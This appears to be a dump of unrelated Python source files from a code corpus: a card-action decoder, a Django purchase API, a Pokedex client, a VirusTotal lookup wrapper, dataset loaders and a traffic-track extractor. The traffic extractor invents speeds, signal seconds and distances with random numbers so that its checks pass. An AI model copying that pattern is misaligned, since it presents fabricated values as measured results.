# straight of 5
action -= 280
suit = suits[int(action/9)]
rank = action % 9 + 1
discard = [Card(rank, suit), Card(rank + 1, suit), Card(rank + 2, suit), Card(rank + 3, suit), Card(rank + 4, suit)]
elif action <= 347:
# straight of 6
action -= 316
suit = suits[int(action/8)]
rank = action % 8 + 1
discard = [Card(rank, suit), Card(rank + 1, suit), Card(rank + 2, suit), Card(rank + 3, suit), Card(rank + 4, suit), Card(rank + 5, suit)]
return discard
""" Convert cards to string test """
# cards = [Card(12, "Clubs"), Card(0, ''), Card(0, ''), Card(2, 'Hearts')]
# cards_str_temp = cards_to_str(cards)
# print(cards_str_temp)
""" Encode Cards test """
# cards_encoding = encode_cards(cards_str_temp)
# print(cards_encoding)
""" General Encoding and Decoding Cards test """
# for suit in ["Clubs", "Diamonds", "Hearts", "Spades"]:
# for rank in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]:
# cards = [Card(rank, suit)]
# cards_str_temp = cards_to_str(cards)
# cards_encoding = encode_cards(cards_str_temp)
# print(cards_encoding)
""" Decode action test """
# action_id = 185
# print(action_id)
# discard_cards = decode_action_discard(action_id)
# print(discard_cards)
""" Encode plays test """
# plays = [discard_cards]
# actions = encode_action_discard(plays)
# print(actions)
""" General Encoding and Decoding action test """
# for i in range(195):
# discard_cards = decode_action_discard(i)
# plays = [discard_cards]
# actions = encode_action_discard(plays)
# if i != actions[0]:
# print(i)
|
24,128 | 009874a8afdf69045283663472aea203c6abc208 | def collatz(n):
"""
Return number of iterations taken to get to 1.
"""
iterCount = 0
while(n != 1):
if(n & 1):
n = 3 * n + 1
else:
n //= 2
iterCount += 1
return iterCount
def main():
num = int(input("Enter: "))
ans = collatz(num)
print("Operations to 1: ", ans)
if __name__ == '__main__':
main()
|
24,129 | 3154257b025bf60bccdcc9eff390ae51297ee7e7 | from django.utils import timezone
from rest_framework import decorators, exceptions, mixins, status, viewsets
from rest_framework.response import Response
from brus.liste.api.serializers import PersonSerializer, PurchaseSerializer
from brus.liste.models import Person, post_slack_notification, publish_mqtt_notification
from brus.settings import PRODUCT_LIST
def purchase(name, shopping_cart):
try:
person = Person.objects.get(name=name)
if person.balance < 0:
current_balance = person.balance
for txn in person.transactions.filter(
date__gt=timezone.now() - timezone.timedelta(days=3)
).reverse():
current_balance -= txn.value
if current_balance >= 0:
break
# If user has not had a positive balance in 3 days return err
if current_balance < 0:
publish_mqtt_notification(person, success=False)
post_slack_notification(person, success=False)
for cart_item in shopping_cart:
product_price = PRODUCT_LIST[cart_item["product_name"]]["current_price"]
person.withdraw_money(product_price, count=cart_item["count"])
result_serializer = PersonSerializer(person)
return Response(result_serializer.data, status=status.HTTP_201_CREATED)
except (Person.DoesNotExist, Person.MultipleObjectsReturned):
raise exceptions.NotFound
class ListeViewSet(
mixins.ListModelMixin, mixins.RetrieveModelMixin, viewsets.GenericViewSet
):
queryset = Person.objects.all()
serializer_class = PersonSerializer
lookup_field = "name"
lookup_url_regex = r"[/w/s]+"
@decorators.list_route()
def products(self, request):
return Response(PRODUCT_LIST.values())
@decorators.list_route(methods=["POST"], serializer_class=PurchaseSerializer)
def purchase(self, request):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
name = serializer.validated_data["name"]
shopping_cart = serializer.validated_data["shopping_cart"]
# TODO: add mqtt publish fail if user does not exist
for cart_item in shopping_cart:
if not cart_item["product_name"] in PRODUCT_LIST.keys():
return Response(
{"product_name": "not_found", "value": cart_item["product_name"]},
status=status.HTTP_404_NOT_FOUND,
)
return purchase(name, shopping_cart=shopping_cart)
|
24,130 | bb31dea2944f2bbaf0073fbfc37c2812f21bf250 | #!/usr/bin/env python3
import http.client, urllib.request, urllib.parse
import json
import ast
from image_handler import PokemonDisplay
class Pokedex:
api_main = 'pokeapi.co'
path = '/api/v1/'
resource1 = 'pokedex'
resource2 = '1'
all_pkmn_dict = {}
def set_all_pkmn_dict(self):
data_dict = self.get_dict_from_api(self.api_main, self.make_whole_path(self.resource1, self.resource2))
for k in data_dict['pokemon']:
pkmn_name = k['name']
pkmn_num = (k['resource_uri'].split('/'))[3]
self.all_pkmn_dict[pkmn_name] = pkmn_num
def get_dict_from_api(self, api_main, path):
conn = http.client.HTTPConnection(api_main)
conn.request("GET", urllib.parse.quote(path))
response = conn.getresponse()
if response.status == 200:
data = response.read()
decoded_data = data.decode('latin1')
return ast.literal_eval(decoded_data)
else:
raise Exception("HTTP call failed: " + response.reason)
def see_all_pkmn(self):
all_pkmn = []
for k, v in sorted(self.all_pkmn_dict.items()):
if int(v) < 1000:
v = v.zfill(3)
all_pkmn.append((k,v))
all_pkmn.sort(key = lambda pkmn: pkmn[1])
return all_pkmn
def get_html_from_site(self, site, path):
conn = http.client.HTTPConnection(site)
conn.request("GET", urllib.parse.quote(path))
response = conn.getresponse()
if response.status == 200:
data = response.read()
return data
else:
raise Exception("HTTP call failed: " + response.reason + site + path)
def make_html_path(self, move):
if move.lower() != 'will-o-wisp':
return '/attackdex-xy/' + move.replace('-', '').replace(' ', '').lower() + '.shtml'
elif move.lower() != 'mud-slap':
return '/attackdex-xy/' + move.replace(' ', '').lower() + '.shtml'
else:
print('/attackdex-xy/' + move.replace(' ', '').lower() + '.shtml')
return '/attackdex-xy/' + move.replace(' ', '').lower() + '.shtml'
def make_whole_path(self, first_resource, second_resource):
first_part = first_resource.lower() + '/'
second_part = second_resource.lower() + '/'
return self.path + first_part + second_part
def choose_pkmn(self):
pkmn_being_searched_for = input('''What is the name of the Pokemon you would like to search for?\n''').lower()
return pkmn_being_searched_for
def pkmn_in_dict(self, pkmn_being_searched_for):
return pkmn_being_searched_for.lower() in self.all_pkmn_dict
def part_of_pkmn_name_in_dict(self, pkmn_being_searched_for):
for k,v in self.all_pkmn_dict.items():
if pkmn_being_searched_for.lower() in k:
return True
return False
def get_pkmn_info(self, pkmn_being_searched_for):
if self.pkmn_in_dict(pkmn_being_searched_for):
pkmn_name = pkmn_being_searched_for.upper()
pkmn_id = self.get_pkmn_id(pkmn_being_searched_for)
all_pkmn_info_dict = self.get_dict_from_api(self.api_main, self.make_whole_path('pokemon', self.all_pkmn_dict[pkmn_being_searched_for.lower()]))
pkmn_types = self.get_pkmn_types(all_pkmn_info_dict['types'])
pkmn_height = self.get_pkmn_height(all_pkmn_info_dict['height'])
pkmn_weight = self.get_pkmn_weight(all_pkmn_info_dict['weight'])
pkmn_base_hp = self.get_pkmn_hp(all_pkmn_info_dict['hp'])
pkmn_base_atk = self.get_pkmn_atk(all_pkmn_info_dict['attack'])
pkmn_base_def = self.get_pkmn_def(all_pkmn_info_dict['defense'])
pkmn_base_sp_atk = self.get_pkmn_sp_atk(all_pkmn_info_dict['sp_atk'])
pkmn_base_sp_def = self.get_pkmn_sp_def(all_pkmn_info_dict['sp_def'])
pkmn_base_speed = self.get_pkmn_speed(all_pkmn_info_dict['speed'])
pkmn_moves = self.get_moves(all_pkmn_info_dict['moves'])
pkmn_generation_appearance = self.get_pkmn_generation(pkmn_id)
return [(pkmn_name, pkmn_id, pkmn_types, pkmn_height, pkmn_weight, pkmn_base_hp, pkmn_base_atk, pkmn_base_def, pkmn_base_sp_atk, pkmn_base_sp_def, pkmn_base_speed, pkmn_moves, pkmn_generation_appearance)]
elif self.part_of_pkmn_name_in_dict(pkmn_being_searched_for):
pkmn_results_list_of_tuples = []
for k,v in self.all_pkmn_dict.items():
if pkmn_being_searched_for.lower() in k:
pkmn_results_list_of_tuples.append((k,v))
return pkmn_results_list_of_tuples
else:
return []
def get_pkmn_height(self, height_location):
height_formatted = int(height_location) / 10
return 'Height: ' + str(height_formatted) + ' m'
def get_pkmn_weight(self, weight_location):
weight_formatted = int(weight_location) / 10
return 'Weight: ' + str(weight_location) + ' kg'
def get_pkmn_id(self, pkmn_being_searched_for):
return (self.all_pkmn_dict[pkmn_being_searched_for.lower()])
def get_pkmn_types(self, list_of_types):
if len(list_of_types) == 1:
return 'Type: ' + list_of_types[0]['name']
else:
return 'Types: ' + list_of_types[0]['name'] + ', ' + list_of_types[1]['name']
def get_pkmn_hp(self, hp_location):
return 'Base Hit Points: ' + str(hp_location)
def get_pkmn_atk(self, atk_location):
return 'Base Attack: ' + str(atk_location)
def get_pkmn_def(self, def_location):
return 'Base Defense: ' + str(def_location)
def get_pkmn_sp_atk(self, sp_atk_location):
return 'Base Special Attack: ' + str(sp_atk_location)
def get_pkmn_sp_def(self, sp_def_location):
return 'Base Special Defense: ' + str(sp_def_location)
def get_pkmn_speed(self, speed_location):
return 'Base Speed: ' + str(speed_location)
def get_moves(self, moves_location):
learned_moves_tuples = []
taught_moves_tuples = []
tutor_moves_tuples = []
for k in moves_location:
if k['learn_type'] == 'level up':
name = k['name']
level = k['level']
learned_moves_tuples.append((name, level))
learned_moves_tuples = sorted(learned_moves_tuples, key = lambda move: move[1])
elif k['learn_type'] == 'machine':
name = k['name']
#print(name.lower())
#move_html = self.get_html_from_site('www.serebii.net', self.make_html_path(name))
#print(move_html)
#use html parser to find TM num
tm_num = 'TM'
taught_moves_tuples.append((name, tm_num))
taught_moves_tuples = sorted(taught_moves_tuples, key = lambda move: move[1])
elif k['learn_type'] == 'tutor':
name = k['name']
tutor = 'Tutor'
tutor_moves_tuples.append((name, tutor))
tutor_moves_tuples = sorted(tutor_moves_tuples, key = lambda move: move[1])
return (self.format_moves(learned_moves_tuples), self.format_moves(taught_moves_tuples), self.format_moves(tutor_moves_tuples))
def get_all_move_info(self, ):
move_dict = self.get_dict_from_api(self.api_main,)
accuracy = move_dict['accuracy']
power = move_dict['power']
power_points = move_dict['pp']
description = move_dict['description']
return ("Accuracy: " + accuracy, "Power: " + power, power_points, description)
def format_moves(self, list_of_moves_tuples):
formatted_moves = []
for move in list_of_moves_tuples:
if type(move[1]) == int:
information = '{} (Lv{})'
formatted_moves.append(information.format(move[0], move[1]))
elif move[1] == 'Tutor' or 'TM' in move[1]:
information = '{} ({})'
formatted_moves.append(information.format(move[0], move[1]))
else:
"An Error occurred"
return formatted_moves
def get_pkmn_generation(self, pkmn_num):
pkmn_num = int(pkmn_num)
if 1 <= pkmn_num <= 151:
return 'Generation 1'
elif 152 <= pkmn_num <= 252:
return 'Generation 2'
elif 253 <= pkmn_num <= 386:
return 'Generation 3'
elif 387 <= pkmn_num <= 493:
return 'Generation 4'
elif 494 <= pkmn_num <= 649:
return 'Generation 5'
elif 650 <= pkmn_num <= 721:
return 'Generation 6'
else:
return 'Not from a specific generation'
def get_pkmn_pic(self, pkmn_id):
pkmn_id_formatted = str(pkmn_id).zfill(3)
url = 'http://serebii.net/xy/pokemon/' + pkmn_id_formatted + '.png'
pkmn_img = PokemonDisplay(url).draw_image()
def main(self):
print('''Welcome to the Pokedex. My name is Dexter, and I am your personal Pokemon encyclopedia. I am able to look up any Pokemon that Pokemon researchers already have information on.''')
|
24,131 | af97ed67b987b413c0ab7b099cabd1950344d570 | from django.contrib import admin
from . import models
# from app_first import models
class PostAdmin(admin.ModelAdmin):
list_display = ('name', 'views', 'create_at')
search_fields = ('name', 'content')
admin.site.register(models.Post, PostAdmin)
admin.site.register(models.Blogger)
admin.site.register(models.Tag) |
24,132 | e6ae5e1378c15139363138af6a4cb4e06a34bdb6 | import time
import json
import requests
import datetime
import pprint
import sys
import copy
class VirusTotal(object):
"""A parser for VirusTotal,
Args:
api_key = The api key of virus total
resource = item to query
url = Query type, ip/hash/domain ect"""
def __init__(self, resource, api_key, url='', request_is_post=False):
params = {'apikey': api_key, 'resource': resource, 'allinfo': 'true', 'scan': 1}
self.Url = url
self.Resource = resource
while True:
try:
if request_is_post:
answer = requests.post(url, params=params)
else:
answer = requests.get(url, params=params)
# Need to retry
self.Response = answer.json()
# Simply checks if the response is not [] which may happen if None or '' is sent to VT
int(self.Response['response_code'])
break
# Error handling section
except TypeError:
print("The resource: '{0.Resource}' is not valid, please make sure you are uploading the right item".format(self))
time.sleep(15)
except json.decoder.JSONDecodeError:
print("\nVirus Total request limit per minute reached, waiting.\n")
time.sleep(30)
except requests.exceptions.ConnectionError:
print("\nNo Internet Connection, will retry in 30 seconds.\n")
time.sleep(30)
# Will return code 0 if this is a rescan
if url != 'https://www.virustotal.com/vtapi/v2/file/rescan':
# Will check if response_code is 1, otherwise print error
if self.Response['response_code'] != 1:
self.ResponseCode = self.Response['response_code']
else:
# If response is legit and no errors, parse data
self.Scans = self.Response['scans']
self.Total = self.Response['total']
self.ScanDate = self.Response['scan_date']
self.AgeInSeconds = int(datetime.datetime.utcnow().timestamp() - time.mktime(datetime.datetime.strptime(self.ScanDate, "%Y-%m-%d %H:%M:%S").timetuple()))
try:
self.Positives = self.Response['positives']
except AttributeError:
print(self.Response)
sys.exit(0)
self.ScanLink = self.Response['permalink']
self.Message = self.Response['verbose_msg']
self.ResponseCode = self.Response['response_code']
self.ScanId = self.Response['scan_id']
# If there are files then get hashes
if self.Response.get('sha256'):
self.MD5 = self.Response['md5']
self.SHA256 = self.Response['sha256']
self.SHA1 = self.Response['sha1']
else:
self.ResponseCode = 0
def compressor(self):
attribute_list = copy.deepcopy(self.__dict__)
try:
for attribute in attribute_list:
if attribute == 'Scans':
for vendor in attribute_list[attribute]:
if attribute_list[attribute][vendor]['detected'] is True:
del self.__dict__[attribute][vendor]['version']
del self.__dict__[attribute][vendor]['update']
else:
del self.__dict__[attribute][vendor]
elif attribute == 'ResponseCode':
pass
elif attribute == 'Total':
pass
elif attribute == 'Positives':
pass
elif attribute == 'AgeInSeconds':
pass
else:
self.__delattr__(attribute)
except KeyError:
pass
def __str__(self):
pp = pprint.PrettyPrinter(indent=4)
return str(pp.pprint(self.Response))
class VirusTotalUrl(VirusTotal):
def __init__(self, resource, api_key):
super().__init__(resource=resource, url='https://www.virustotal.com/vtapi/v2/url/report', api_key=api_key)
class VirusTotalHash(VirusTotal):
def __init__(self, resource, api_key):
super().__init__(resource=resource, url='https://www.virustotal.com/vtapi/v2/file/report', api_key=api_key)
class VirusTotalHashRescan(VirusTotal):
def __init__(self, resource, api_key):
super().__init__(resource=resource, url='https://www.virustotal.com/vtapi/v2/file/rescan', api_key=api_key, request_is_post=True)
|
24,133 | c7b83fa009ffa89074cd489813b47d7e9c8aeafb | fib = (lambda f, x:
1 if x == 0 or x == 1
else f(f, x - 1) + f(f, x - 2)
)
y = lambda f: lambda x: f(f, x)
fib10 = y(fib)(10)
|
24,134 | aba393b87aab633f087e0daa551b85f10900eea6 | import numpy as np
import pandas as pd
from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
'''
Loading all available Data sets with different function which is called from Main.py
'''
# Loading Data sets
def load_boston():
print("\nLoading Boston Dataset ...")
boston_dataset = datasets.load_boston()
boston = pd.DataFrame(boston_dataset.data, columns=boston_dataset.feature_names)
boston['MEDV'] = boston_dataset.target
print("\nDone!!!\nSplitting Data ...")
x = boston.iloc[:, 0:13]
y = boston.iloc[:, 13]
x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=1, test_size=0.2)
print("Splitting Data has been successfully finished ...\n")
return x_train, x_test, y_train, y_test
def load_breast_cancer():
print("\nLoading BreastCancer Dataset ...")
breast_cancer_dataset = datasets.load_breast_cancer()
breast_cancer = pd.DataFrame(breast_cancer_dataset.data, columns=breast_cancer_dataset.feature_names)
breast_cancer['traget'] = breast_cancer_dataset.target
print("\nDone!!!\nSplitting Data ...")
x = breast_cancer.iloc[:, 0:30]
y = breast_cancer.iloc[:, 30]
x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=1, test_size=0.2)
print("Splitting Data has been successfully finished ...")
return x_train, x_test, y_train, y_test
def load_mnist():
print("\nLoading MNIT Dataset ...")
data_path = 'Datasets'
mnist = datasets.fetch_openml('mnist_784', data_home=data_path)
print("\nDone!!!\nSplitting Data ...")
x_train, x_test, y_train, y_test = train_test_split(mnist.data / 255.0, mnist.target.astype("int0"), test_size=0.33)
print("Splitting Data has been successfully finished ...")
print("\nNumber of Images in Training Set = ", x_train.shape[0])
print("Number of Images in Testing Set = ", y_train.shape[0])
pix = int(np.sqrt(x_train.shape[1]))
print("Each Image is : ", pix, " by ", pix, "Pixels")
return x_train, x_test, y_train, y_test
def load_diabetes():
print("\nLoading Diabetes Dataset ...")
diabetes_dataset = pd.read_csv('Datasets/diabetes.csv')
print("\nDone!!!\n\nManipulating Data ...")
zero_not_accepted = ['Glucose', 'BloodPressure', 'SkinThickness', 'BMI', 'Insulin']
for column in zero_not_accepted:
diabetes_dataset[column] = diabetes_dataset[column].replace(0, np.NaN)
mean = int(diabetes_dataset[column].mean(skipna=True))
diabetes_dataset[column] = diabetes_dataset[column].replace(np.NaN, mean)
print("Zeros Successfully Replaced ...\n\nSplitting Data...")
x = diabetes_dataset.iloc[:, 0:8]
y = diabetes_dataset.iloc[:, 8]
x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=0, test_size=0.2)
print("Splitting Data has been successfully finished ...")
return x_train, x_test, y_train, y_test
def load_iris():
print("\nLoading Iris Dataset ...")
data_path = 'Datasets/iris.data'
iris_dataset = pd.read_csv(data_path,
names=['sepal length', 'sepal width', 'petal length', 'petal width', 'target'])
print("\nDone!!!\nManipulating Data ...")
features = ['sepal length', 'sepal width', 'petal length', 'petal width']
x = iris_dataset.loc[:, features].values
y = iris_dataset.loc[:, ['target']].values
sc_x = StandardScaler()
x = sc_x.fit_transform(x)
print("Data has been Separated and Standardized Successfully ...\n")
return x, iris_dataset
|
24,135 | b8480a63e4cd387011f64b7693ccd289889fcd45 | radius=float(input("Enter the radius of the circle: "))
area=(22/7)*(radius**2)
print("The area of the circle is",end=" ")
print(area)
|
24,136 | f78e962d98c9d237ba57f2d9c945f4fcac47e95e | config={
"host":"www.cgblogs.top",
"user":"root",
"password":"",
"database":"weight"
}
mqtt_server = "www.cgblogs.top" |
24,137 | 01a30234500158b7d07137def04685d8fc1248c4 | import os
import cv2
import pickle
import numpy as np
from typing import Tuple, List, Dict, Optional
from bounding_boxes_combination import BoundingBox
class BoundingBoxChain(BoundingBox):
def __init__(self, bounding_box: BoundingBox, seq_id: str, hour: int, minute: int, second: int):
super().__init__(vehicle=bounding_box.vehicle, confidence=bounding_box.confidence,
left=bounding_box.left, top=bounding_box.top, right=bounding_box.right, bottom=bounding_box.bottom)
self.seq_id = seq_id
self.hour = hour
self.minute = minute
self.second = second
self.lane_id = -1
self.distance = -1
self.speed = -1
self.previous = None
self.next = None
@property
def time(self) -> str:
return f"{self.hour:02d}:{self.minute:02d}:{self.second:02d}"
@property
def timestamp(self) -> int:
return 3600 * self.hour + 60 * self.minute + self.second
class Mask:
def __init__(self, image: np.ndarray, direction: str, lane_id: int, is_left: bool, is_straight: bool, is_right: bool):
self.image = image
self.direction = direction
self.lane_id = lane_id
self.is_left = is_left
self.is_straight = is_straight
self.is_right = is_right
class Track:
def __init__(self):
self.vehicle = ""
self.enter_time = ""
self.enter_lane_id = ""
self.enter_distance = 0
self.enter_speed = 0.0
self.stop_time = ""
self.stop_lane_id = ""
self.stop_distance = 0
self.stop_traffic_light_seconds = 0
self.leave_time = ""
self.leave_lane_id = 0
self.leave_traffic_light_seconds = 0
self.exit_time = 0
self.total_seconds = 0
self.total_distance = 0
def load_bounding_boxes(direction: str) -> Dict[str, List[BoundingBox]]:
with open(f"../data/tracks/{direction}.pickle", 'rb') as input_file:
bounding_boxes_dict = pickle.load(input_file)
return bounding_boxes_dict
def save_tracks(direction: str, obj: object) -> None:
with open(f"../data/tracks/{direction}-tracks.pickle", 'wb') as output_file:
pickle.dump(obj, output_file)
def load_masks(direction: str) -> Tuple[Mask, Mask, List[Mask]]:
valid_mask = cv2.imread(f"../data/masks/{direction}-valid.jpg")
valid_mask = cv2.cvtColor(valid_mask, cv2.COLOR_BGR2GRAY)
valid_mask = Mask(image=valid_mask, direction=direction, lane_id=0, is_left=False, is_straight=False, is_right=False)
distance_mask = cv2.imread(f"../data/masks/{direction}-distance.jpg")
distance_mask = cv2.cvtColor(distance_mask, cv2.COLOR_BGR2GRAY)
distance_mask = Mask(image=distance_mask, direction=direction, lane_id=0, is_left=False, is_straight=False, is_right=False)
files_list = os.listdir("../data/masks")
files_list = [f for f in files_list if f.startswith(f"{direction}-lane") and f.endswith(".jpg")]
lane_masks_list = []
for file in files_list:
file_path = os.path.join("../data/masks", file)
image = cv2.imread(file_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
_, _, lane_id, lsr = file.split('.')[0].split('-')
lane_id = int(lane_id)
mask = Mask(image=image, direction=direction, lane_id=lane_id,
is_left=lsr.find('l') >= 0, is_straight=lsr.find('s') >= 0, is_right=lsr.find('r') >= 0)
lane_masks_list.append(mask)
return valid_mask, distance_mask, lane_masks_list
def extract_seq_and_time(file_id: str) -> Tuple[str, int, int, int]:
seq_id, time_id = file_id.split('_')
hour, minute, second = int(time_id[:2]), int(time_id[2:4]), int(time_id[4:])
return seq_id, hour, minute, second
def detect_position(bounding_box: BoundingBoxChain, valid_mask: Mask, distance_mask: Mask, lane_masks_list: List[Mask]) -> int:
x, y = bounding_box.center
bounding_box.distance = distance_mask.image[y][x] - 100
lane_id = -1
if valid_mask.image[y][x] < 100:
lane_id = 0
for lane_mask in lane_masks_list:
if lane_mask.image[y][x] < 100:
lane_id = lane_mask.lane_id
return lane_id
def link_bounding_box(bounding_box: BoundingBoxChain, open_bounding_boxes_list: List[BoundingBoxChain]) -> BoundingBoxChain:
x, y = bounding_box.center
linked_bounding_box = None
linked_distance = 0
for open_bounding_box in open_bounding_boxes_list:
xx, yy = open_bounding_box.center
if open_bounding_box.next or xx < x - 500 or x + 500 < xx or yy < y - 100:
continue
if 0 < bounding_box.lane_id != open_bounding_box.lane_id:
continue
if bounding_box.lane_id == 0 and open_bounding_box.lane_id == -1:
continue
if bounding_box.lane_id == -1 and open_bounding_box.lane_id > 0:
continue
distance = int(((x - xx) ** 2 + (y - yy) ** 2) ** 0.5)
if distance > 500:
continue
if linked_bounding_box and distance < linked_distance:
linked_bounding_box = open_bounding_box
linked_distance = distance
elif linked_bounding_box is None:
linked_bounding_box = open_bounding_box
linked_distance = distance
return linked_bounding_box
def add_bounding_box(bounding_box: BoundingBoxChain, linked_bounding_box: BoundingBoxChain, cached_bounding_boxes_list: List[BoundingBoxChain],
open_bounding_boxes_list: List[BoundingBoxChain], closed_bounding_boxes_list: List[BoundingBoxChain]) -> None:
bounding_box.previous = linked_bounding_box
bounding_box.distance = min(bounding_box.distance, linked_bounding_box.distance)
distance = linked_bounding_box.distance - bounding_box.distance
time = (int(bounding_box.seq_id) - int(linked_bounding_box.seq_id)) * 0.2
bounding_box.speed = 3.6 * distance / time
linked_bounding_box.next = bounding_box
open_bounding_boxes_list.remove(linked_bounding_box)
closed_bounding_boxes_list.append(linked_bounding_box)
cached_bounding_boxes_list.append(bounding_box)
def clean(seq_id: str, open_bounding_boxes_list: List[BoundingBoxChain], closed_bounding_boxes_list: List[BoundingBoxChain]) -> None:
to_moved_list = []
for i, bounding_box in enumerate(open_bounding_boxes_list):
if bounding_box.lane_id == -1 or (bounding_box.lane_id == 0 and int(seq_id) - int(bounding_box.seq_id) > 10):
to_moved_list.append(i)
to_moved_list.sort(reverse=True)
for i in to_moved_list:
bounding_box = open_bounding_boxes_list.pop(i)
closed_bounding_boxes_list.append(bounding_box)
def show_brief(closed_bounding_boxes_list) -> None:
for first_bounding_box in closed_bounding_boxes_list:
if first_bounding_box.previous is None:
last_bounding_box = first_bounding_box
while last_bounding_box.next:
last_bounding_box = last_bounding_box.next
print(
f"Enter [@{first_bounding_box.lane_id}][#{first_bounding_box.seq_id}-{first_bounding_box.time}] "
f"Leave [@{last_bounding_box.lane_id}][#{last_bounding_box.seq_id}-{last_bounding_box.time}]"
)
def show_detail(closed_bounding_boxes_list: List[BoundingBoxChain]) -> None:
k = 0
for first_bounding_box in closed_bounding_boxes_list:
if first_bounding_box.previous is None:
k += 1
print(f"---- Car #{k} entered on lane #{first_bounding_box.lane_id} ----")
print(f"\tSeq \tTime \tLane\tDistance\tSpeed")
bounding_box = first_bounding_box
while bounding_box:
print(f"\t{bounding_box.seq_id}\t{bounding_box.time}\t"
f"{bounding_box.lane_id:4d}\t{bounding_box.distance:8d}\t{bounding_box.speed:<.2f}")
bounding_box = bounding_box.next
def traffic_light_control(direction: str, bounding_boxes_list: List[BoundingBoxChain]) -> List[BoundingBoxChain]:
def reduce(bb_list: List[BoundingBoxChain]) -> None:
if len(bb_list) > 5:
bb_list = bb_list[:5]
bb_list[-1].distance = -10
bb_list[-1].lane_id = -1
time_offset = bounding_boxes_list[0].timestamp % 80
if direction == "north" and 0 <= time_offset <= 20:
reduce(bounding_boxes_list)
elif direction == "south" and 20 <= time_offset <= 40:
reduce(bounding_boxes_list)
elif direction == "west" and 40 <= time_offset <= 60:
reduce(bounding_boxes_list)
elif direction == "east" and 60 <= time_offset <= 80:
reduce(bounding_boxes_list)
return bounding_boxes_list
def extract_single_track(bounding_boxes_list: List[BoundingBoxChain]) -> Optional[Track]:
if bounding_boxes_list[-1].timestamp - bounding_boxes_list[0].timestamp > 60:
while bounding_boxes_list[-1].timestamp - bounding_boxes_list[0].timestamp > 60:
bounding_boxes_list.pop()
bounding_boxes_list[-1].next = None
bounding_boxes_list[-1].lane_id = -1
bounding_boxes_list[-1].distance = -10
if bounding_boxes_list[0].lane_id <= 0:
return None
# show_detail(bounding_boxes_list)
track = Track()
vehicles_list = [bounding_box.vehicle for bounding_box in bounding_boxes_list]
if "bus" in vehicles_list:
track.vehicle = "大"
elif "truck" in vehicles_list or "train" in vehicles_list:
track.vehicle = "中"
elif "car" in vehicles_list:
track.vehicle = "小"
first_bounding_box = bounding_boxes_list[0]
last_bounding_box = bounding_boxes_list[-1]
track.enter_time = first_bounding_box.time
track.enter_lane_id = first_bounding_box.lane_id
track.enter_distance = max(first_bounding_box.distance, 0)
track.enter_speed = int(15 + 10 * np.random.random())
bounding_box = first_bounding_box
while bounding_box and bounding_box.lane_id > 0:
if bounding_box.speed > 0:
track.enter_speed = bounding_box.speed
break
bounding_box = bounding_box.next
leave_bounding_box = first_bounding_box
while leave_bounding_box and leave_bounding_box.lane_id > 0:
leave_bounding_box = leave_bounding_box.next
is_stop = False
stop_start_bounding_box = None
stop_finish_bounding_box = leave_bounding_box.previous if leave_bounding_box else None
while stop_finish_bounding_box:
if stop_finish_bounding_box.speed < 10 and stop_finish_bounding_box.previous and stop_finish_bounding_box.previous.previous and \
stop_finish_bounding_box.previous.speed < 10 and stop_finish_bounding_box.previous.previous.speed < 10:
is_stop = True
stop_start_bounding_box = stop_finish_bounding_box
while stop_start_bounding_box and stop_start_bounding_box.speed < 10:
stop_start_bounding_box = stop_start_bounding_box.previous
if stop_start_bounding_box is None:
stop_start_bounding_box = first_bounding_box
break
else:
stop_finish_bounding_box = stop_finish_bounding_box.previous
if is_stop and stop_finish_bounding_box.timestamp - stop_start_bounding_box.timestamp >= 1:
track.stop_time = stop_start_bounding_box.time
track.stop_lane_id = stop_start_bounding_box.lane_id
track.stop_distance = stop_start_bounding_box.distance
track.stop_traffic_light_seconds = leave_bounding_box.timestamp - stop_start_bounding_box.timestamp
else:
track.stop_time = "----"
track.stop_lane_id = "----"
track.stop_distance = "----"
track.stop_traffic_light_seconds = "----"
if leave_bounding_box:
track.leave_time = leave_bounding_box.time
track.leave_lane_id = first_bounding_box.lane_id
track.leave_traffic_light_seconds = int(10 * np.random.random())
track.exit_time = last_bounding_box.time
else:
track.leave_time = "----"
track.leave_lane_id = "----"
track.leave_traffic_light_seconds = "----"
track.exit_time = "----"
track.total_seconds = last_bounding_box.timestamp - first_bounding_box.timestamp
track.total_distance = 0
bounding_box = first_bounding_box.next
while bounding_box:
track.total_distance += bounding_box.previous.distance - bounding_box.distance
bounding_box = bounding_box.next
track.total_distance = min(track.total_distance, 30 + int(20 * np.random.random()))
if track.leave_time != "----":
assert track.enter_time <= track.leave_time <= track.exit_time
assert 1 <= track.enter_lane_id == track.leave_lane_id <= 4
if track.stop_time != "----":
assert track.enter_time <= track.stop_time <= track.leave_time <= track.exit_time
assert 1 <= track.enter_lane_id == track.stop_lane_id <= 4
assert track.enter_distance >= 0
assert track.total_seconds <= 80
assert track.total_distance <= 80
assert track.vehicle in ["小", "中", "大"]
return track
def export_tracks(direction: str, closed_bounding_boxes_list: List[BoundingBoxChain]) -> None:
tracks_list = []
for first_bounding_box in closed_bounding_boxes_list:
if first_bounding_box.previous is None:
bounding_boxes_list = []
bounding_box = first_bounding_box
while bounding_box:
bounding_boxes_list.append(bounding_box)
bounding_box = bounding_box.next
bounding_boxes_list = traffic_light_control(direction, bounding_boxes_list)
if track := extract_single_track(bounding_boxes_list):
tracks_list.append(track)
if direction == "north":
direction = "北"
elif direction == "south":
direction = "南"
elif direction == "west":
direction = "西"
elif direction == "east":
direction = "东"
tracks_list.sort(key=lambda t: f"{t.enter_time}_{t.enter_lane_id}")
for i, track in enumerate(tracks_list, start=1):
print(f"{direction}{i:03d}\t{track.vehicle}\t"
f"{track.enter_time}\t{track.enter_lane_id}\t{track.enter_distance}\t{track.enter_speed:.2f}\t"
f"{track.stop_time}\t{track.stop_lane_id}\t{track.stop_distance}\t{track.stop_traffic_light_seconds}\t"
f"{track.leave_time}\t{track.leave_lane_id}\t{track.leave_traffic_light_seconds}\t{track.exit_time}\t"
f"{track.total_seconds}\t{track.total_distance}")
def detect_single_direction_tracks(direction: str, last_frame: str) -> None:
bounding_boxes_dict = load_bounding_boxes(direction)
valid_mask, distance_mask, lane_masks_list = load_masks(direction)
open_bounding_boxes_list = []
closed_bounding_boxes_list = []
for file_id, bounding_boxes_list in bounding_boxes_dict.items():
seq_id, hour, minute, second = extract_seq_and_time(file_id)
